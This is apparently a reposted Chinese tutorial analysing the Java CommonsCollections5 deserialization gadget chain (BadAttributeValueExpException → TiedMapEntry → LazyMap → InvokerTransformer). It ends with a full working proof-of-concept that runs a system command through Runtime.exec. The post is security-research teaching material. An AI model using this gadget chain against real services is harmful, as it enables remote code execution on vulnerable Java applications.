devbox
凡人多烦事01
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[Java反序列化]—CommonsCollections5_cc5 java

作者:凡人多烦事01 | 2024-06-09 16:00:12

cc5 java

先贴张其他师傅的图

其实 CC5就是CC1的一种变形,前半段改修一下,后面接上就是CC5了。CC1是通过AnnotationInvocationHandler.invoke()获取get(),而CC5则是通过TiedMapEntry.toString(),其余部分都是一样的

分析

看看TiedMapEntry如何调用的 get 方法

  1. public String toString() {
  2.     return getKey() + "=" + getValue();
  3. }

getValue 中调用了 get()

  1. public Object getValue() {
  2.     return map.get(key);
  3. }

这里可以用构造器修改map的值,就可以接上后面的部分

  1. public TiedMapEntry(Map map, Object key) {
  2.     super();
  3.     this.map = map;
  4.     this.key = key;
  5. }

再来看看哪里调用的toString()

全局搜索,在在BadAttributeValueExpException类中的readObject()中发现调用

  1. private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
  2.     ObjectInputStream.GetField gf = ois.readFields();
  3.     Object valObj = gf.get("val", null);
  4.  
  5.     if (valObj == null) {
  6.         val = null;
  7.     } else if (valObj instanceof String) {
  8.         val= valObj;
  9.     } else if (System.getSecurityManager() == null
  10.             || valObj instanceof Long
  11.             || valObj instanceof Integer
  12.             || valObj instanceof Float
  13.             || valObj instanceof Double
  14.             || valObj instanceof Byte
  15.             || valObj instanceof Short
  16.             || valObj instanceof Boolean) {
  17.         val = valObj.toString();
  18.     } else { // the serialized object is from a version without JDK-8019292 fix
  19.         val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
  20.     }
  21. }
val = valObj.toString();

调用的是valObj .toString(), 所以我们要构造valObj为 TiedMapEntry类,看一下valObj的定义:

  1. ObjectInputStream.GetField gf = ois.readFields();
  2. Object valObj = gf.get("val", null);

先调用readFields从流中读取了所有的持久化字段,然后调用get()方法得到了名字是val的字段。

所以可以通过修改val的值,来修改valobj,而val是本类中的一个私有属性,直接反射修改即可

private Object val;

链子就清晰了,构造

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

这里实例化这个对象,需要传值 NUll,因为在他的构造方法中 有个

  1. public BadAttributeValueExpException (Object val) {
  2.     this.val = val == null ? null : val.toString();
  3. }

如果传值为null ,则赋值null给var,如果val有值,则会直接调用toString,提前出发我们反序列化

接着通过反射 修改val的值为 TiedMapEntry 类就可以了

最终poc

  1. package CommonsCollections5;
  2.  
  3. import javax.management.BadAttributeValueExpException;
  4. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  5. import org.apache.commons.collections.Transformer;
  6. import org.apache.commons.collections.functors.ChainedTransformer;
  7. import org.apache.commons.collections.functors.ConstantTransformer;
  8. import org.apache.commons.collections.functors.InvokerTransformer;
  9. import org.apache.commons.collections.map.LazyMap;
  10.  
  11. import java.io.*;
  12. import java.lang.reflect.*;
  13. import java.util.HashMap;
  14. import java.util.Map;
  15.  
  16. public class cc5 {
  17.     public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException, NoSuchMethodException, IOException, NoSuchFieldException {
  18.         Transformer[] transformers = new Transformer[]{
  19.                 new ConstantTransformer(Runtime.class),
  20.                 new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),
  21.                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),
  22.                 new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
  23.         };
  24.         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
  25.         Map innerMap = new HashMap();
  26.  
  27.         Map outerMap = LazyMap.decorate(innerMap,chainedTransformer);
  28.  
  29.         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
  30.         TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"snowyf");
  31.         Class<BadAttributeValueExpException> badAttributeValueExpExceptionClass = BadAttributeValueExpException.class;
  32.         Field val = badAttributeValueExpExceptionClass.getDeclaredField("val");
  33.         val.setAccessible(true);
  34.         val.set(badAttributeValueExpException,tiedMapEntry);
  35.  
  36.         serialize(badAttributeValueExpException);
  37.         unserialize("1.txt");
  38.  
  39.     }
  40.  
  41.  
  42.     public static void serialize(Object obj) throws IOException {
  43.         ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
  44.         out.writeObject(obj);
  45.     }
  46.  
  47.  
  48.     public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
  49.         ObjectInputStream In = new ObjectInputStream(new FileInputStream(Filename));
  50.         Object o = In.readObject();
  51.         return o;
  52.     }
  53. }
  54.  
  55.

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop】
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号